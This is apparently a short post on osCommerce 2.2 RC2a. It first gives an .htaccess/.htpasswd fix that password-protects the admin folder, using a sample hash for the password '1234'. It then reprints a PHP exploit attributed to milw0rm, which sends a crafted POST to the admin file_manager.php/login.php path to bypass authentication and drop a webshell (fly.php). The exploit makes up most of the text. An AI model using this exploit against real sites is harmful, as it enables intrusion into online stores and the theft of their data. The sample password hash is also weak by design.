Fix
If you use are using osCommerce 2.2 RC2a that comes in some many webhosting packages by default, one solution from being hacked with the default installation is to add to the .httaccess
this line:
AuthName "Restricted Area"
AuthType Basic
AuthUserFile /home/yourusername/oscommerce-folder/admin/.htpasswd
AuthGroupFile /dev/null
require valid-user
and create an .htpasswd file with your admin username with this line:
admin:$apr1$gVSQE/..$/Gn7sCLhfb7xsz1Zo1xlv1
(Note: the above password is 1234, do not use as your password)
Exploit
Code from milw0rm:
<?php
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
echo '[~]No response from'.$host;
die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>
# milw0rm.com [2009-08-31]